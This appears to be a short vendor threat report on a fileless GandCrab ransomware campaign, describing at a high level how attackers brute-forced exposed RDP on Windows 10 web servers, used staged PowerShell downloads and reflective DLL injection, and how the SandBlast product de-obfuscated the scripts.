The GandCrab ransomware, which was discovered in January 2018, is a well-known ransomware that has been widely distributed on the dark web. The ransomware targets mainly Scandinavian and English-speaking countries.
The GandCrab ransomware was quickly adopted by cybercriminals due to its unique features such as custom ransom notes based on the type and volume of encrypted files ranging, from low hundreds to thousands of dollars. GandCrab also makes use of several entry vectors in order to penetrate a victim’s machine.
Fileless ransomware attacks operate by taking default Windows tools, particularly PowerShell and Windows Management Instrumentation (WMI), and using them for malicious activities.
The SandBlast team was made aware of the fileless attacks recently targeting a series of Windows 10 machines that acted as a Web Server. In this case, the machines had their RDP ports open and publicly accessible. As a result, attackers managed to remotely log into machines by using ‘Brute Force’ technique and then executed a simple command thus triggering the ransomware process.
The attack then proceeds with a Windows Command prompt, which then calls PowerShell, a native Windows framework that uses a command-line shell to manage tasks and to download a malicious script. The first stage PowerShell script was actually an obfuscated script that determined the Processor architecture of the system and downloaded the second stage script suitable to the corresponding operating system.
The second stage PowerShell script used ‘Reflective DLL Injection’ technique. Using this technique, attackers omitted a few things that Windows normally does for DLLs. After this, the PowerShell process was essentially hijacked by GandCrab and acted as a Portable Binary for GandCrab’s internal functions.
However, the PowerShell scripts were de-obfuscated by SandBlast Behavioral Guard and was added to the report to increase the transparency and understanding of the script’s intentions.